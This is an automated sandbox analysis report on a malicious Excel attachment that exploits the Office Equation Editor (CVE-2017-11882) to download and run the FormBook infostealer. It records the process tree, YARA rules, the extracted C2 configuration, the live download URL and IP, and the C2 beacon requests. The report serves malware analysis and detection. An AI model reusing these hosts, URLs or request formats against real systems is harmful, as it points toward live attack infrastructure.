Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Vecchio debito_SKTGH_465585484754.xlsx

Overview

General Information

Sample Name:Vecchio debito_SKTGH_465585484754.xlsx
Analysis ID:562488
MD5:3ecca47c8fd3d3fe23e3de46298b346c
SHA1:0bed1382da7ffeaf9aa0aa28e9143cffc0ec606d
SHA256:6f401d7546fc2bd85b659a1d30a89bf21451e327e2712ab86f1a3dec421b7e64
Tags:FormbookVelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2552 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 3048 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1416 cmdline: "C:\Users\Public\vbc.exe" MD5: A8F58E851A89075EE8AB92E5CB6A776C)
      • vbc.exe (PID: 2860 cmdline: C:\Users\Public\vbc.exe MD5: A8F58E851A89075EE8AB92E5CB6A776C)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cscript.exe (PID: 2540 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
            • cmd.exe (PID: 2812 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.drmichaelirvine.com/yrcy/"], "decoy": ["ordermws-brands.com", "jkbswj.com", "dairatwsl.com", "lewismiddleton.com", "hevenorfeed.com", "kovogueshop.com", "cyberitconsultingz.com", "besrbee.com", "workerscompfl1.com", "wayfinderacu.com", "smplkindness.com", "servicesitcy.com", "babyvv.com", "fly-crypto.com", "chahuima.com", "trist-n.tech", "minjia56.com", "oded.top", "mes-dents-blanches.com", "nethunsleather.com", "onlinesindh.com", "genrage.com", "bhalawat.com", "5gwirelesszone.com", "semejnyjochag.com", "shopvintageallure.com", "laqueenbeautybar.supplies", "hominyprintingmuseum.com", "taksimbet13.com", "fairytalesinc.com", "loversscout.com", "nxn-n.com", "lovebydarius.store", "mintnft.tours", "snowjamproductiosmedia.com", "boraviajar.website", "cryptointelcenter.com", "m2momshealth.com", "perfectionbyinjection.com", "cletechsolutions.com", "skin4trade.com", "a9d7c19f0282.com", "waltersswholesale.com", "lendsoar.com", "virginialandsforsale.com", "shinepatio.com", "nba2klocker.team", "picturebookoriginals.com", "chatteusa.com", "bodevolidu.quest", "certidaoja.com", "scgxjp.com", "cbd-cannabis-store.com", "kadinisigi.com", "vacoveco.com", "hostedexchangemaintainces.com", "hf59184.com", "jingguanfm.com", "browsealto.com", "kymyra.com", "xrgoods.com", "dtsddcpj.com", "uptimisedmc.com", "redsigndesign.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.0.vbc.exe.400000.5.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.0.vbc.exe.400000.5.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.0.vbc.exe.400000.5.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        5.0.vbc.exe.400000.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.vbc.exe.400000.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.167.92.57, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3048, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3048, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          System Summary

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3048, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1416
          Sigma detected: Execution from Suspicious Folder
          Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3048, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1416

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.drmichaelirvine.com/yrcy/"], "decoy": ["ordermws-brands.com", "jkbswj.com", "dairatwsl.com", "lewismiddleton.com", "hevenorfeed.com", "kovogueshop.com", "cyberitconsultingz.com", "besrbee.com", "workerscompfl1.com", "wayfinderacu.com", "smplkindness.com", "servicesitcy.com", "babyvv.com", "fly-crypto.com", "chahuima.com", "trist-n.tech", "minjia56.com", "oded.top", "mes-dents-blanches.com", "nethunsleather.com", "onlinesindh.com", "genrage.com", "bhalawat.com", "5gwirelesszone.com", "semejnyjochag.com", "shopvintageallure.com", "laqueenbeautybar.supplies", "hominyprintingmuseum.com", "taksimbet13.com", "fairytalesinc.com", "loversscout.com", "nxn-n.com", "lovebydarius.store", "mintnft.tours", "snowjamproductiosmedia.com", "boraviajar.website", "cryptointelcenter.com", "m2momshealth.com", "perfectionbyinjection.com", "cletechsolutions.com", "skin4trade.com", "a9d7c19f0282.com", "waltersswholesale.com", "lendsoar.com", "virginialandsforsale.com", "shinepatio.com", "nba2klocker.team", "picturebookoriginals.com", "chatteusa.com", "bodevolidu.quest", "certidaoja.com", "scgxjp.com", "cbd-cannabis-store.com", "kadinisigi.com", "vacoveco.com", "hostedexchangemaintainces.com", "hf59184.com", "jingguanfm.com", "browsealto.com", "kymyra.com", "xrgoods.com", "dtsddcpj.com", "uptimisedmc.com", "redsigndesign.com"]}
          Multi AV Scanner detection for submitted file
          Source: Vecchio debito_SKTGH_465585484754.xlsxVirustotal: Detection: 39%Perma Link
          Source: Vecchio debito_SKTGH_465585484754.xlsxReversingLabs: Detection: 32%
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://103.167.92.57/CRC/vbc.exeAvira URL Cloud: Label: malware
          Source: www.drmichaelirvine.com/yrcy/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: dairatwsl.comVirustotal: Detection: 7%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 5.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.477475563.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.514399498.0000000000910000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.478435499.0000000000600000.00000004.00000800.00020000.00000000.sdmp, cscript.exe
          Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CharUnicodeIn.pdb source: vbc.exe
          Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp
          Source: global trafficDNS query: name: www.hevenorfeed.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.167.92.57:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.167.92.57:80
          Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.244.46 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.188.192.2 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 216.177.167.5 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.laqueenbeautybar.supplies
          Source: C:\Windows\explorer.exeDomain query: www.dairatwsl.com
          Source: C:\Windows\explorer.exeDomain query: www.vacoveco.com
          Source: C:\Windows\explorer.exeDomain query: www.hevenorfeed.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.drmichaelirvine.com/yrcy/
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
          Source: global trafficHTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A== HTTP/1.1Host: www.hevenorfeed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP HTTP/1.1Host: www.dairatwsl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw== HTTP/1.1Host: www.laqueenbeautybar.suppliesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.167.92.57 103.167.92.57
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 21:47:30 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 28 Jan 2022 10:19:01 GMTETag: "c2800-5d6a1c37988f5"Accept-Ranges: bytesContent-Length: 796672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9a c1 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 1a 0c 00 00 0a 00 00 00 00 00 00 5e 38 0c 00 00 20 00 00 00 40 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 0c 00 4b 00 00 00 00 60 0c 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 c1 37 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 0c 00 00 20 00 00 00 1a 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0c 00 00 02 00 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 05 00 00 00 60 0c 00 00 06 00 00 00 20 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /CRC/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 103.167.92.57
